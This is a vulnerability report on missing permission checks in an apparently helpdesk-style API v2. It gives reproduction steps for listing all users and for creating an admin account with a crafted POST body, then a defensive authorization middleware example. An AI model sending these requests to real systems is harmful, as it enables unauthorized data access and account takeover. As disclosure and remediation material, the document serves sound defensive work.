Several API v2 endpoints do not check permissions, which allows attackers to retrieve or edit information for:
- tickets
- accounts
- groups
- departments
- teams
- ElasticSearch
Get users list
1. Login.
2. Go to `/api/v2/accounts?type=all`.
3. The users list is returned.
Create user with admin role
1. Get the admin role id in `/api/v2/accounts`.
2. Send a POST to `/api/v2/accounts` with a body such as:

```json
{"username":"test21233","fullname":"test21233","title":"test2","email":"[email protected]","teams":["627ce1fd9f59377095600ce9"],"role":"627ce1fd9f59377095600ce1","password":"test2test2","passwordConfirm":"test2test2"}
```
Many API endpoints are affected; the steps above show only a sample of the attack vectors that are possible.
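As an added example (not code from this report or from the project), here is a deny-by-default authorization check of the kind that closes these gaps on the account, group, team and department routes, including the role-assignment case from the second scenario. The role ids, permission names and session shape are constructed assumptions.

```javascript
// Added example, not the project's own code: deny-by-default authorization for
// the API v2 routes named in the report. Role ids, permission names and the
// session/request shape are constructed assumptions.

const ROLES = {
  'role-admin': { accounts: ['view', 'create', 'update'], groups: ['view', 'update'],
                  teams: ['view', 'update'], departments: ['view', 'update'] },
  'role-support': { accounts: ['view'], groups: ['view'], teams: ['view'], departments: ['view'] },
  'role-user': {},
};

// Permission each route requires. Routes absent from this table are refused,
// so a new endpoint cannot ship with only a "logged in" check.
const ROUTE_POLICY = {
  'GET /api/v2/accounts': ['accounts', 'view'],
  'POST /api/v2/accounts': ['accounts', 'create'],
  'PUT /api/v2/accounts': ['accounts', 'update'],
  'GET /api/v2/groups': ['groups', 'view'],
  'GET /api/v2/teams': ['teams', 'view'],
  'GET /api/v2/departments': ['departments', 'view'],
};

function can(roleId, resource, action) {
  const grants = ROLES[roleId];
  return Boolean(grants && grants[resource] && grants[resource].includes(action));
}

// A role may be assigned only if every grant it carries is also held by the
// caller; this stops a lower-privileged caller from creating an admin account.
function canAssignRole(callerRoleId, targetRoleId) {
  const target = ROLES[targetRoleId];
  if (!target) return false;
  return Object.entries(target).every(([resource, actions]) =>
    actions.every((action) => can(callerRoleId, resource, action)));
}

// req = { method, path, session: { roleId } | null, body }
function authorize(req) {
  if (!req.session || !req.session.roleId) return { status: 401, reason: 'login required' };
  const policy = ROUTE_POLICY[`${req.method} ${req.path}`];
  if (!policy) return { status: 403, reason: 'no policy for route' };
  const [resource, action] = policy;
  if (!can(req.session.roleId, resource, action)) return { status: 403, reason: `missing ${resource}:${action}` };
  if (req.method === 'POST' && req.path === '/api/v2/accounts' &&
      !canAssignRole(req.session.roleId, req.body && req.body.role)) {
    return { status: 403, reason: 'cannot assign a role with more rights than your own' };
  }
  return { status: 200, reason: 'ok' };
}
```

In an Express-style app this would run as middleware before every `/api/v2` handler, so a valid session alone never grants access to a resource.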